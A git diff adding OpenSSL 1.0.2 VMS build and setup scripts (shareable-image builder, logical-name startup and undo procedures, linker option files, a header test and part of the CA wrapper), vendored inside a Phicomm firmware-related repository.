diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/mkshared.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/mkshared.com
new file mode 100644
index 0000000..b0d1fda
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/mkshared.com
@@ -0,0 +1,476 @@
+$! MKSHARED.COM -- Create shareable images.
+$!
+$! P1: "64" for 64-bit pointers.
+$!
+$! P2: Zlib object library path (optional).
+$!
+$! Input:	[.UTIL]LIBEAY.NUM,[.xxx.EXE.CRYPTO]SSL_LIBCRYPTO[32].OLB
+$!		[.UTIL]SSLEAY.NUM,[.xxx.EXE.SSL]SSL_LIBSSL[32].OLB
+$!		[.CRYPTO.xxx]OPENSSLCONF.H
+$! Output:	[.xxx.EXE.CRYPTO]SSL_LIBCRYPTO_SHR[32].OPT,.MAP,.EXE
+$!		[.xxx.EXE.SSL]SSL_LIBSSL_SRH[32].OPT,.MAP,.EXE
+$!
+$! So far, tests have only been made on VMS for Alpha.  VAX will come in time.
+$! ===========================================================================
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$! Save the original default device:[directory].
+$!
+$ def_orig = f$environment( "default")
+$ on error then goto tidy
+$ on control_c then goto tidy
+$!
+$! SET DEFAULT to the main kit directory.
+$!
+$ proc = f$environment("procedure")
+$ proc = f$parse( "A.;", proc)- "A.;"
+$ set default 'proc'
+$ set default [-]
+$!
+$! ----- Prepare info for processing: version number and file info
+$ gosub read_version_info
+$ if libver .eqs. ""
+$ then
+$   write sys$error "ERROR: Couldn't find any library version info..."
+$   go to tidy:
+$ endif
+$
+$ if (f$getsyi("cpu") .lt. 128)
+$ then
+$   arch_vax = 1
+$   arch = "VAX"
+$ else
+$   arch_vax = 0
+$   arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$   if (arch .eqs. "") then arch = "UNK"
+$ endif
+$!
+$ archd = arch
+$ lib32 = "32"
+$ shr = "SHR32"
+$!
+$ if (p1 .nes. "")
+$ then
+$   if (p1 .eqs. "64")
+$   then
+$     archd = arch+ "_64"
+$     lib32 = ""
+$     shr = "SHR"
+$   else
+$     if (p1 .nes. "32")
+$     then
+$       write sys$output "Second argument invalid."
+$       write sys$output "It should be "32", "64", or nothing."
+$       exit
+$     endif
+$   endif
+$ endif
+$!
+$! ----- Prepare info for processing: disabled algorithms info
+$ gosub read_disabled_algorithms_info
+$!
+$ ZLIB = p2
+$ zlib_lib = ""
+$ if (ZLIB .nes. "")
+$ then
+$   file2 = f$parse( ZLIB, "libz.olb", , , "syntax_only")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     write sys$output ""
+$     write sys$output "The Option ", ZLIB, " Is Invalid."
+$     write sys$output "    Can't find library: ''file2'"
+$     write sys$output ""
+$     goto tidy
+$   endif
+$   zlib_lib = ", ''file2' /library"
+$ endif
+$!
+$ if (arch_vax)
+$ then
+$   libtit = "CRYPTO_TRANSFER_VECTOR"
+$   libid  = "Crypto"
+$   libnum = "[.UTIL]LIBEAY.NUM"
+$   libdir = "[.''ARCHD'.EXE.CRYPTO]"
+$   libmar = "''libdir'SSL_LIBCRYPTO_''shr'.MAR"
+$   libolb = "''libdir'SSL_LIBCRYPTO''lib32'.OLB"
+$   libopt = "''libdir'SSL_LIBCRYPTO_''shr'.OPT"
+$   libobj = "''libdir'SSL_LIBCRYPTO_''shr'.OBJ"
+$   libmap = "''libdir'SSL_LIBCRYPTO_''shr'.MAP"
+$   libgoal= "''libdir'SSL_LIBCRYPTO_''shr'.EXE"
+$   libref = ""
+$   libvec = "LIBCRYPTO"
+$   if f$search( libolb) .nes. "" then gosub create_vax_shr
+$   libtit = "SSL_TRANSFER_VECTOR"
+$   libid  = "SSL"
+$   libnum = "[.UTIL]SSLEAY.NUM"
+$   libdir = "[.''ARCHD'.EXE.SSL]"
+$   libmar = "''libdir'SSL_LIBSSL_''shr'.MAR"
+$   libolb = "''libdir'SSL_LIBSSL''lib32'.OLB"
+$   libopt = "''libdir'SSL_LIBSSL_''shr'.OPT"
+$   libobj = "''libdir'SSL_LIBSSL_''shr'.OBJ"
+$   libmap = "''libdir'SSL_LIBSSL_''shr'.MAP"
+$   libgoal= "''libdir'SSL_LIBSSL_''shr'.EXE"
+$   libref = "[.''ARCHD'.EXE.CRYPTO]SSL_LIBCRYPTO_''shr'.EXE"
+$   libvec = "LIBSSL"
+$   if f$search( libolb) .nes. "" then gosub create_vax_shr
+$ else
+$   libid  = "Crypto"
+$   libnum = "[.UTIL]LIBEAY.NUM"
+$   libdir = "[.''ARCHD'.EXE.CRYPTO]"
+$   libolb = "''libdir'SSL_LIBCRYPTO''lib32'.OLB"
+$   libopt = "''libdir'SSL_LIBCRYPTO_''shr'.OPT"
+$   libmap = "''libdir'SSL_LIBCRYPTO_''shr'.MAP"
+$   libgoal= "''libdir'SSL_LIBCRYPTO_''shr'.EXE"
+$   libref = ""
+$   if f$search( libolb) .nes. "" then gosub create_nonvax_shr
+$   libid  = "SSL"
+$   libnum = "[.UTIL]SSLEAY.NUM"
+$   libdir = "[.''ARCHD'.EXE.SSL]"
+$   libolb = "''libdir'SSL_LIBSSL''lib32'.OLB"
+$   libopt = "''libdir'SSL_LIBSSL_''shr'.OPT"
+$   libmap = "''libdir'SSL_LIBSSL_''shr'.MAP"
+$   libgoal= "''libdir'SSL_LIBSSL_''shr'.EXE"
+$   libref = "[.''ARCHD'.EXE.CRYPTO]SSL_LIBCRYPTO_''shr'.EXE"
+$   if f$search( libolb) .nes. "" then gosub create_nonvax_shr
+$ endif
+$!
+$ tidy:
+$!
+$! Close any open files.
+$!
+$ if (f$trnlnm( "libnum", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close libnum
+$!
+$ if (f$trnlnm( "mar", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close mar
+$!
+$ if (f$trnlnm( "opt", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close opt
+$!
+$ if (f$trnlnm( "vf", "LNM$PROCESS", 0, "SUPERVISOR") .nes. "") then -
+   close vf
+$!
+$! Restore the original default device:[directory].
+$!
+$ set default 'def_orig'
+$ exit
+$
+$! ----- Subroutines to build the shareable libraries
+$! For each supported architecture, there's a main shareable library
+$! creator, which is called from the main code above.
+$! The creator will define a number of variables to tell the next levels of
+$! subroutines what routines to use to write to the option files, call the
+$! main processor, read_func_num, and when that is done, it will write version
+$! data at the end of the .opt file, close it, and link the library.
+$!
+$! read_func_num reads through a .num file and calls the writer routine for
+$! each line.  It's also responsible for checking that order is properly kept
+$! in the .num file, check that each line applies to VMS and the architecture,
+$! and to fill in "holes" with dummy entries.
+$!
+$! The creator routines depend on the following variables:
+$! libnum	The name of the .num file to use as input
+$! libolb	The name of the object library to build from
+$! libid	The identification string of the shareable library
+$! libopt	The name of the .opt file to write
+$! libtit	The title of the assembler transfer vector file (VAX only)
+$! libmar	The name of the assembler transfer vector file (VAX only)
+$! libmap	The name of the map file to write
+$! libgoal	The name of the shareable library to write
+$! libref	The name of a shareable library to link in
+$!
+$! read_func_num depends on the following variables from the creator:
+$! libwriter	The name of the writer routine to call for each .num file line
+$! -----
+$
+$! ----- Subroutines for non-VAX
+$! -----
+$! The creator routine
+$ create_nonvax_shr:
+$   open /write opt 'libopt'
+$   write opt "identification=""",libid," ",libverstr,""""
+$   write opt libolb, " /library"
+$   if libref .nes. "" then write opt libref,"/SHARE"
+$   write opt "SYMBOL_VECTOR=(-"
+$   libfirstentry := true
+$   libwrch   := opt
+$   libwriter := write_nonvax_transfer_entry
+$   textcount = 0
+$   gosub read_func_num
+$   write opt ")"
+$   write opt "GSMATCH=",libvmatch,",",libver
+$   close opt
+$   link /map = 'libmap' /full /share = 'libgoal' 'libopt' /options -
+     'zlib_lib'
+$   return
+$
+$! The record writer routine
+$ write_nonvax_transfer_entry:
+$   if libentry .eqs. ".dummy" then return
+$   if info_kind .eqs. "VARIABLE"
+$   then
+$     pr:=DATA
+$   else
+$     pr:=PROCEDURE
+$   endif
+$   textcount_this = f$length(pr) + f$length(libentry) + 5
+$   if textcount + textcount_this .gt. 1024
+$   then
+$     write opt ")"
+$     write opt "SYMBOL_VECTOR=(-"
+$     textcount = 16
+$     libfirstentry := true
+$   endif
+$   if libfirstentry
+$   then
+$     write 'libwrch' "    ",libentry,"=",pr," -"
+$   else
+$     write 'libwrch' "    ,",libentry,"=",pr," -"
+$   endif
+$   libfirstentry := false
+$   textcount = textcount + textcount_this
+$   return
+$
+$! ----- Subroutines for VAX
+$! -----
+$! The creator routine
+$ create_vax_shr:
+$   open /write mar 'libmar'
+$   type sys$input:/out=mar:
+;
+; Transfer vector for VAX shareable image
+;
+$   write mar "	.TITLE ",libtit
+$   write mar "	.IDENT /",libid,"/"
+$   type sys$input:/out=mar:
+;
+; Define macro to assist in building transfer vector entries.  Each entry
+; should take no more than 8 bytes.
+;
+	.MACRO FTRANSFER_ENTRY routine
+	.ALIGN QUAD
+	.TRANSFER routine
+	.MASK	routine
+	JMP	routine+2
+	.ENDM FTRANSFER_ENTRY
+;
+; Place entries in own program section.
+;
+$   write mar "	.PSECT $$",libvec,",QUAD,PIC,USR,CON,REL,LCL,SHR,EXE,RD,NOWRT"
+$   write mar libvec,"_xfer:"
+$   libwrch   := mar
+$   libwriter := write_vax_ftransfer_entry
+$   gosub read_func_num
+$   type sys$input:/out=mar:
+;
+; Allocate extra storage at end of vector to allow for expansion.
+;
+$   write mar "	.BLKB 32768-<.-",libvec,"_xfer>	; 64 pages total."
+$!   libwriter := write_vax_vtransfer_entry
+$!   gosub read_func_num
+$   write mar "	.END"
+$   close mar
+$   open /write opt 'libopt'
+$   write opt "identification=""",libid," ",libverstr,""""
+$   write opt libobj
+$   write opt libolb, " /library"
+$   if libref .nes. "" then write opt libref,"/SHARE"
+$   type sys$input:/out=opt:
+!
+! Ensure transfer vector is at beginning of image
+!
+CLUSTER=FIRST
+$   write opt "COLLECT=FIRST,$$",libvec
+$   write opt "GSMATCH=",libvmatch,",",libver
+$   type sys$input:/out=opt:
+!
+! make psects nonshareable so image can be installed.
+!
+PSECT_ATTR=$CHAR_STRING_CONSTANTS,NOWRT
+$   libwrch   := opt
+$   libwriter := write_vax_psect_attr
+$   gosub read_func_num
+$   close opt
+$   macro/obj='libobj' 'libmar'
+$   link /map = 'libmap' /full /share = 'libgoal' 'libopt' /options -
+     'zlib_lib'
+$   return
+$
+$! The record writer routine for VAX functions
+$ write_vax_ftransfer_entry:
+$   if info_kind .nes. "FUNCTION" then return
+$   if libentry .eqs ".dummy"
+$   then
+$     write 'libwrch' "	.BLKB 8" ! Dummy is zeroes...
+$   else
+$     write 'libwrch' "	FTRANSFER_ENTRY ",libentry
+$   endif
+$   return
+$! The record writer routine for VAX variables (should never happen!)
+$ write_vax_psect_attr:
+$   if info_kind .nes. "VARIABLE" then return
+$   if libentry .eqs ".dummy" then return
+$   write 'libwrch' "PSECT_ATTR=",libentry,",NOSHR"
+$   return
+$
+$! ----- Common subroutines
+$! -----
+$! The .num file reader.  This one has great responsibility.
+$ read_func_num:
+$   open /read libnum 'libnum'
+$   goto read_nums
+$
+$ read_nums:
+$   libentrynum=0
+$   liblastentry:=false
+$   entrycount=0
+$   loop:
+$     read /end=loop_end /err=loop_end libnum line
+$     lin = f$edit( line, "COMPRESS,TRIM")
+$!    Skip a "#" comment line.
+$     if (f$extract( 0, 1, lin) .eqs. "#") then goto loop
+$     entrynum = f$int(f$element( 1, " ", lin))
+$     entryinfo = f$element( 2, " ", lin)
+$     curentry = f$element( 0, " ", lin)
+$     info_exist = f$element( 0, ":", entryinfo)
+$     info_platforms = ","+ f$element(1, ":", entryinfo)+ ","
+$     info_kind = f$element( 2, ":", entryinfo)
+$     info_algorithms = ","+ f$element( 3, ":", entryinfo)+ ","
+$     if info_exist .eqs. "NOEXIST" then goto loop
+$     truesum = 0
+$     falsesum = 0
+$     negatives = 1
+$     plat_i = 0
+$     loop1:
+$       plat_entry = f$element( plat_i, ",", info_platforms)
+$       plat_i = plat_i + 1
+$       if plat_entry .eqs. "" then goto loop1
+$       if plat_entry .nes. ","
+$       then
+$         if f$extract(0,1,plat_entry) .nes. "!" then negatives = 0
+$         if (arch_vax)
+$         then
+$           if plat_entry .eqs. "EXPORT_VAR_AS_FUNCTION" then -
+$             truesum = truesum + 1
+$           if plat_entry .eqs. "!EXPORT_VAR_AS_FUNCTION" then -
+$             falsesum = falsesum + 1
+$         endif
+$!
+$         if ((plat_entry .eqs. "VMS") .or. -
+            ((plat_entry .eqs. "ZLIB") .and. (ZLIB .nes. "")) .or. -
+            (arch_vax .and. (plat_entry .eqs. "VMSVAX"))) then -
+            truesum = truesum + 1
+$!
+$         if ((plat_entry .eqs. "!VMS") .or. -
+            (arch_vax .and. (plat_entry .eqs. "!VMSVAX"))) then -
+            falsesum = falsesum + 1
+$!
+$	  goto loop1
+$       endif
+$     endloop1:
+$!DEBUG!$     if info_platforms - "EXPORT_VAR_AS_FUNCTION" .nes. info_platforms
+$!DEBUG!$     then
+$!DEBUG!$       write sys$output line
+$!DEBUG!$       write sys$output "        truesum = ",truesum,-
+$!DEBUG!		", negatives = ",negatives,", falsesum = ",falsesum
+$!DEBUG!$     endif
+$     if falsesum .ne. 0 then goto loop
+$     if truesum+negatives .eq. 0 then goto loop
+$     alg_i = 0
+$     loop2:
+$       alg_entry = f$element(alg_i,",",info_algorithms)
+$	alg_i = alg_i + 1
+$       if alg_entry .eqs. "" then goto loop2
+$       if alg_entry .nes. ","
+$       then
+$	  if disabled_algorithms - ("," + alg_entry + ",") .nes disabled_algorithms then goto loop
+$         if f$trnlnm("OPENSSL_NO_"+alg_entry) .nes. "" then goto loop
+$	  goto loop2
+$       endif
+$     endloop2:
+$     if info_platforms - "EXPORT_VAR_AS_FUNCTION" .nes. info_platforms
+$     then
+$!DEBUG!$     write sys$output curentry," ; ",entrynum," ; ",entryinfo
+$     endif
+$   redo:
+$     next:=loop
+$     tolibentry=curentry
+$     if libentrynum .ne. entrynum
+$     then
+$       entrycount=entrycount+1
+$       if entrycount .lt. entrynum
+$       then
+$!DEBUG!$         write sys$output "Info: entrycount: ''entrycount', entrynum: ''entrynum' => 0"
+$         tolibentry=".dummy"
+$         next:=redo
+$       endif
+$       if entrycount .gt. entrynum
+$       then
+$         write sys$error "Decreasing library entry numbers!  Can't continue"
+$         write sys$error """",line,""""
+$         close libnum
+$         return
+$       endif
+$       libentry=tolibentry
+$!DEBUG!$       write sys$output entrycount," ",libentry," ",entryinfo
+$       if libentry .nes. "" .and. libwriter .nes. "" then gosub 'libwriter'
+$     else
+$       write sys$error "Info: ""''curentry'"" is an alias for ""''libentry'"".  Overriding..."
+$     endif
+$     libentrynum=entrycount
+$     goto 'next'
+$   loop_end:
+$   close libnum
+$   return
+$
+$! The version number reader
+$ read_version_info:
+$   libver = ""
+$   open /read vf [.CRYPTO]OPENSSLV.H
+$   loop_rvi:
+$     read/err=endloop_rvi/end=endloop_rvi vf rvi_line
+$     if rvi_line - "SHLIB_VERSION_NUMBER """ .eqs. rvi_line then -
+	goto loop_rvi
+$     libverstr = f$element(1,"""",rvi_line)
+$     libvmajor = f$element(0,".",libverstr)
+$     libvminor = f$element(1,".",libverstr)
+$     libvedit = f$element(2,".",libverstr)
+$     libvpatch = f$cvui(0,8,f$extract(1,1,libvedit)+"@")-f$cvui(0,8,"@")
+$     libvedit = f$extract(0,1,libvedit)
+$     libver = f$string(f$int(libvmajor)*100)+","+-
+	f$string(f$int(libvminor)*100+f$int(libvedit)*10+f$int(libvpatch))
+$     if libvmajor .eqs. "0"
+$     then
+$       libvmatch = "EQUAL"
+$     else
+$       ! Starting with the 1.0 release, backward compatibility should be
+$       ! kept, so switch over to the following
+$       libvmatch = "LEQUAL"
+$     endif
+$   endloop_rvi:
+$   close vf
+$   return
+$
+$! The disabled algorithms reader
+$ read_disabled_algorithms_info:
+$   disabled_algorithms = ","
+$   open /read cf [.CRYPTO.'ARCH']OPENSSLCONF.H
+$   loop_rci:
+$     read/err=endloop_rci/end=endloop_rci cf rci_line
+$     rci_line = f$edit(rci_line,"TRIM,COMPRESS")
+$     rci_ei = 0
+$     if f$extract(0,9,rci_line) .eqs. "# define " then rci_ei = 2
+$     if f$extract(0,8,rci_line) .eqs. "#define " then rci_ei = 1
+$     if rci_ei .eq. 0 then goto loop_rci
+$     rci_e = f$element(rci_ei," ",rci_line)
+$     if f$extract(0,11,rci_e) .nes. "OPENSSL_NO_" then goto loop_rci
+$     disabled_algorithms = disabled_algorithms + f$extract(11,999,rci_e) + ","
+$     goto loop_rci
+$   endloop_rci:
+$   close cf
+$   return
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/multinet_shr.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/multinet_shr.opt
new file mode 100644
index 0000000..610f42d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/multinet_shr.opt
@@ -0,0 +1 @@
+multinet:multinet_socket_library.exe/share
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_startup.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_startup.com
new file mode 100755
index 0000000..04bbbde
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_startup.com
@@ -0,0 +1,108 @@
+$!
+$! Startup file for OpenSSL 1.x.
+$!
+$! 2011-03-05 SMS.
+$!
+$! This procedure must reside in the OpenSSL installation directory.
+$! It will fail if it is copied to a different location.
+$!
+$! P1  qualifier(s) for DEFINE.  For example, "/SYSTEM" to get the
+$!     logical names defined in the system logical name table.
+$!
+$! P2  "64", to use executables which were built with 64-bit pointers.
+$!
+$! Good (default) and bad status values.
+$!
+$ status =    %x00010001 ! RMS$_NORMAL, normal successful completion.
+$ rms_e_fnf = %x00018292 ! RMS$_FNF, file not found.
+$!
+$! Prepare for problems.
+$!
+$ orig_dev_dir = f$environment( "DEFAULT")
+$ on control_y then goto clean_up
+$ on error then goto clean_up
+$!
+$! Determine hardware architecture.
+$!
+$ if (f$getsyi( "cpu") .lt. 128)
+$ then
+$   arch_name = "VAX"
+$ else
+$   arch_name = f$edit( f$getsyi( "arch_name"), "upcase")
+$   if (arch_name .eqs. "") then arch_name = "UNK"
+$ endif
+$!
+$ if (p2 .eqs. "64")
+$ then
+$   arch_name_exe = arch_name+ "_64"
+$ else
+$   arch_name_exe = arch_name
+$ endif
+$!
+$! Derive the OpenSSL installation device:[directory] from the location
+$! of this command procedure.
+$!
+$ proc = f$environment( "procedure")
+$ proc_dev_dir = f$parse( "A.;", proc, , , "no_conceal") - "A.;"
+$ proc_dev = f$parse( proc_dev_dir, , , "device", "syntax_only")
+$ proc_dir = f$parse( proc_dev_dir, , , "directory", "syntax_only") - -
+   ".][000000"- "[000000."- "]["- "["- "]"
+$ proc_dev_dir = proc_dev+ "["+ proc_dir+ "]"
+$ set default 'proc_dev_dir'
+$ set default [-]
+$ ossl_dev_dir = f$environment( "default")
+$!
+$! Check existence of expected directories (to see if this procedure has
+$! been moved away from its proper place).
+$!
+$ if ((f$search( "certs.dir;1") .eqs. "") .or. -
+   (f$search( "include.dir;1") .eqs. "") .or. -
+   (f$search( "private.dir;1") .eqs. "") .or. -
+   (f$search( "vms.dir;1") .eqs. ""))
+$ then
+$    write sys$output -
+      "   Can't find expected common OpenSSL directories in:"
+$    write sys$output "   ''ossl_dev_dir'"
+$    status = rms_e_fnf
+$    goto clean_up
+$ endif
+$!
+$ if ((f$search( "''arch_name_exe'_exe.dir;1") .eqs. "") .or. -
+   (f$search( "''arch_name'_lib.dir;1") .eqs. ""))
+$ then
+$    write sys$output -
+      "   Can't find expected architecture-specific OpenSSL directories in:"
+$    write sys$output "   ''ossl_dev_dir'"
+$    status = rms_e_fnf
+$    goto clean_up
+$ endif
+$!
+$! All seems well (enough).  Define the OpenSSL logical names.
+$!
+$ ossl_root = ossl_dev_dir- "]"+ ".]"
+$ define /translation_attributes = concealed /nolog'p1 SSLROOT 'ossl_root'
+$ define /nolog 'p1' SSLCERTS     sslroot:[certs]
+$ define /nolog 'p1' SSLINCLUDE   sslroot:[include]
+$ define /nolog 'p1' SSLPRIVATE   sslroot:[private]
+$ define /nolog 'p1' SSLEXE       sslroot:['arch_name_exe'_exe]
+$ define /nolog 'p1' SSLLIB       sslroot:['arch_name'_lib]
+$!
+$! Defining OPENSSL lets a C program use "#include <openssl/{foo}.h>":
+$ define /nolog 'p1' OPENSSL      SSLINCLUDE:
+$!
+$! Run a site-specific procedure, if it exists.
+$!
+$ if f$search( "sslroot:[vms]openssl_systartup.com") .nes."" then -
+   @ sslroot:[vms]openssl_systartup.com
+$!
+$! Restore the original default dev:[dir] (if known).
+$!
+$ clean_up:
+$!
+$ if (f$type( orig_dev_dir) .nes. "")
+$ then
+$    set default 'orig_dev_dir'
+$ endif
+$!
+$ EXIT 'status'
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_undo.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_undo.com
new file mode 100755
index 0000000..d1623a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_undo.com
@@ -0,0 +1,20 @@
+$!
+$! Deassign OpenSSL logical names.
+$!
+$ call deass "OPENSSL" "''p1'"
+$ call deass "SSLCERTS" "''p1'"
+$ call deass "SSLEXE" "''p1'"
+$ call deass "SSLINCLUDE" "''p1'"
+$ call deass "SSLLIB" "''p1'"
+$ call deass "SSLPRIVATE" "''p1'"
+$ call deass "SSLROOT" "''p1'"
+$!
+$ exit
+$!
+$deass: subroutine
+$ if (f$trnlnm( p1) .nes. "")
+$ then
+$    deassign 'p2' 'p1'
+$ endif
+$ endsubroutine
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_utils.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_utils.com
new file mode 100644
index 0000000..64f4915
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/openssl_utils.com
@@ -0,0 +1,46 @@
+$!
+$!  APPS.COM
+$!  Written By:  Robert Byer
+$!               Vice-President
+$!               A-Com Computing, Inc.
+$!               byer@mail.all-net.net
+$!
+$!
+$! Slightly modified by Richard Levitte <richard@levitte.org>
+$!
+$!
+$! Always define OPENSSL.  Others are optional (non-null P1).
+$!
+$ OPENSSL  :== $SSLEXE:OPENSSL
+$
+$ IF (P1 .NES. "")
+$ THEN
+$     VERIFY   :== $SSLEXE:OPENSSL VERIFY
+$     ASN1PARSE:== $SSLEXE:OPENSSL ASN1PARS
+$! REQ could conflict with REQUEST.
+$     OREQ     :== $SSLEXE:OPENSSL REQ
+$     DGST     :== $SSLEXE:OPENSSL DGST
+$     DH       :== $SSLEXE:OPENSSL DH
+$     ENC      :== $SSLEXE:OPENSSL ENC
+$     GENDH    :== $SSLEXE:OPENSSL GENDH
+$     ERRSTR   :== $SSLEXE:OPENSSL ERRSTR
+$     CA       :== $SSLEXE:OPENSSL CA
+$     CRL      :== $SSLEXE:OPENSSL CRL
+$     RSA      :== $SSLEXE:OPENSSL RSA
+$     DSA      :== $SSLEXE:OPENSSL DSA
+$     DSAPARAM :== $SSLEXE:OPENSSL DSAPARAM
+$     X509     :== $SSLEXE:OPENSSL X509
+$     GENRSA   :== $SSLEXE:OPENSSL GENRSA
+$     GENDSA   :== $SSLEXE:OPENSSL GENDSA
+$     S_SERVER :== $SSLEXE:OPENSSL S_SERVER
+$     S_CLIENT :== $SSLEXE:OPENSSL S_CLIENT
+$     SPEED    :== $SSLEXE:OPENSSL SPEED
+$     S_TIME   :== $SSLEXE:OPENSSL S_TIME
+$     VERSION  :== $SSLEXE:OPENSSL VERSION
+$     PKCS7    :== $SSLEXE:OPENSSL PKCS7
+$     CRL2PKCS7:== $SSLEXE:OPENSSL CRL2P7
+$     SESS_ID  :== $SSLEXE:OPENSSL SESS_ID
+$     CIPHERS  :== $SSLEXE:OPENSSL CIPHERS
+$     NSEQ     :== $SSLEXE:OPENSSL NSEQ
+$     PKCS12   :== $SSLEXE:OPENSSL PKCS12
+$ ENDIF
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/socketshr_shr.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/socketshr_shr.opt
new file mode 100644
index 0000000..f6e3131
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/socketshr_shr.opt
@@ -0,0 +1 @@
+socketshr/share
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/tcpip_shr_decc.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/tcpip_shr_decc.opt
new file mode 100644
index 0000000..33b159e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/tcpip_shr_decc.opt
@@ -0,0 +1 @@
+sys$share:tcpip$ipc_shr.exe/share
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/test-includes.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/test-includes.com
new file mode 100644
index 0000000..c1d7ccd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/test-includes.com
@@ -0,0 +1,28 @@
+$! Quick script to check how well including individual header files works
+$! on VMS, even when the VMS macro isn't defined.
+$
+$	sav_def = f$env("DEFAULT")
+$	here = f$parse("A.;0",f$ENV("PROCEDURE")) - "A.;0"
+$	set default 'here'
+$	set default [-.include.openssl]
+$	define openssl 'f$env("DEFAULT")'
+$	set default [--]
+$
+$ loop:
+$	f = f$search("openssl:*.h")
+$	if f .eqs. "" then goto loop_end
+$	write sys$output "Checking ",f
+$	open/write foo foo.c
+$	write foo "#undef VMS"
+$	write foo "#include <stdio.h>"
+$	write foo "#include <openssl/",f$parse(f,,,"NAME"),".h>"
+$	write foo "main()"
+$	write foo "{printf(""foo\n"");}"
+$	close foo
+$	cc/STANDARD=ANSI89/NOLIST/PREFIX=ALL foo.c
+$	delete foo.c;
+$	goto loop
+$ loop_end:
+$	set default 'save_def'
+$	exit
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc.opt
new file mode 100644
index 0000000..28d84f4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc.opt
@@ -0,0 +1 @@
+sys$share:ucx$ipc_shr.exe/share
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc_log.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc_log.opt
new file mode 100644
index 0000000..c9d9a96
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_decc_log.opt
@@ -0,0 +1 @@
+ucx$ipc_shr/share
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_vaxc.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_vaxc.opt
new file mode 100644
index 0000000..86bfaf0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/ucx_shr_vaxc.opt
@@ -0,0 +1 @@
+sys$library:ucx$ipc.olb/library
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.com
new file mode 100644
index 0000000..2c0d465
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/CA.com
@@ -0,0 +1,236 @@
+$! CA - wrapper around ca to make it easier to use ... basically ca requires
+$!      some setup stuff to be done before you can use it and this makes
+$!      things easier between now and when Eric is convinced to fix it :-)
+$!
+$! CA -newca ... will setup the right stuff
+$! CA -newreq ... will generate a certificate request 
+$! CA -sign ... will sign the generated request and output 
+$!
+$! At the end of that grab newreq.pem and newcert.pem (one has the key 
+$! and the other the certificate) and cat them together and that is what
+$! you want/need ... I'll make even this a little cleaner later.
+$!
+$!
+$! 12-Jan-96 tjh    Added more things ... including CA -signcert which
+$!                  converts a certificate to a request and then signs it.
+$! 10-Jan-96 eay    Fixed a few more bugs and added the SSLEAY_CONFIG
+$!                 environment variable so this can be driven from
+$!                 a script.
+$! 25-Jul-96 eay    Cleaned up filenames some more.
+$! 11-Jun-96 eay    Fixed a few filename missmatches.
+$! 03-May-96 eay    Modified to use 'openssl cmd' instead of 'cmd'.
+$! 18-Apr-96 tjh    Original hacking
+$!
+$! Tim Hudson
+$! tjh@cryptsoft.com
+$!
+$!
+$! default ssleay.cnf file has setup as per the following
+$! demoCA ... where everything is stored
+$
+$ IF F$TYPE(SSLEAY_CONFIG) .EQS. "" THEN SSLEAY_CONFIG := SSLLIB:SSLEAY.CNF
+$
+$ DAYS   = "-days 365"
